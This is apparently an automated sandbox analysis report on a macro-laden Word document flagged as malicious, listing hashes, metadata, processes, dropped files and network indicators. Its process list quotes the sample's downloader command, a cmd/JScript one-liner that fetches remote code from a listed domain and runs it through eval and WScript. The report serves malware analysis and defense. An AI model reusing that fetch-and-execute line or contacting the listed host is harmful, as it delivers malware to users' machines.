analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

9a390a488b44c04154bbbc16845545d3.docx

Full analysis: https://app.any.run/tasks/bb937371-d04b-4844-bc12-6b75b111f462
Verdict: Malicious activity
Analysis date: April 25, 2019, 06:44:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

9A390A488B44C04154BBBC16845545D3

SHA1:

18FF2514BB62FD0811DED71632A9790FEC35763A

SHA256:

13FA3543D636E4EA65ADB0908D64F118F665265687E67BD697F44E4C3368D50B

SSDEEP:

1536:XCcc8ZJoJVi6X4bmK+dHlGChyQpPnRTwnSOmq8jBGF7vkLlyQ9YfZVDzEld:z1JeiVOdlhBPR0np847kIQifZVDzCd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2444)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2444)
  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 3868)
    • Executes scripts

      • cmd.exe (PID: 3692)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1516)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1516)
      • WINWORD.EXE (PID: 2444)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x3cdd2826
ZipCompressedSize: 537
ZipUncompressedSize: 2398
ZipFileName: [Content_Types].xml

XML

Template: Normal
TotalEditTime: 1 minute
Pages: 1
Words: 227
Characters: 1294
Application: Microsoft Office Word
DocSecurity: None
Lines: 10
Paragraphs: 3
ScaleCrop: No
HeadingPairs:
  • Titolo
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1518
SharedDoc: No
HyperlinksChanged: No
AppVersion: 12
LastModifiedBy: Utente0034
RevisionNumber: 2
LastPrinted: 2018:10:12 09:16:00Z
CreateDate: 2019:03:21 08:09:00Z
ModifyDate: 2019:03:21 08:09:00Z

XMP

Creator: Utente
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs verclsid.exe no specs winword.exe no specs cmd.exe no specs wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
1516"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9a390a488b44c04154bbbc16845545d3.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
832"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401C:\Windows\system32\verclsid.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2444"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9a390a488b44c04154bbbc16845545d3.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3692"C:\Windows\system32\cmd.exe" /c echo var B="GET"; var H="mauriz.at/term.php?group=doc"; var V=new ActiveXObject("MSXML2.XMLHTTP"); V.open(B,"http://"+H, false); V.send(); var W=V.responseText; eval(""+W+"")>C:\Users\admin\AppData\Local\Temp878.^js&C:\Users\admin\AppData\Local\Temp878.^jsC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3868"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp878.js" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Total events
1 829
Read events
1 449
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
4

Dropped files

PID
Process
Filename
Type
1516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6EC3.tmp.cvr
MD5:
SHA256:
1516WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EF8FA51B-9DAC-4470-AF2E-00321672BD0A}.tmp
MD5:
SHA256:
2444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB9A7.tmp.cvr
MD5:
SHA256:
2444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\msoBEBF.tmp
MD5:
SHA256:
1516WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BAEC04A54AC968DB29FEE2F2ABDA0EA1
SHA256:230C0E0381E2EA1B4CED9700B32635C2548CB4B0CE50C1D60F5BF49BA8E63985
2444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$390a488b44c04154bbbc16845545d3.docpgc
MD5:50263C848DEABCE2DC05699432022A21
SHA256:95B0B3596CB5432D496100C81432C122AFFBCCE24DD7D564F437EE71F59A4808
1516WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$390a488b44c04154bbbc16845545d3.docxpgc
MD5:32EF39858E6B2F88206BA89B9D4F4E61
SHA256:7E03736391E01C47B372C5608DE73D244C140D46B3A7BD3462995233AEB85F27
3692cmd.exeC:\Users\admin\AppData\Local\Temp878.jstext
MD5:3585106309BD230AD6A03CD53F74DDB3
SHA256:C9C99CD261761AF8F53BCE181E1D674754F50312C2807958AEEE4642EA97412C
3868WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3868
WScript.exe
GET
404
213.160.71.50:80
http://mauriz.at/term.php?group=doc
DE
text
36 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3868
WScript.exe
213.160.71.50:80
mauriz.at
http.net Internet GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
mauriz.at
  • 213.160.71.50
malicious

Threats

No threats detected
No debug info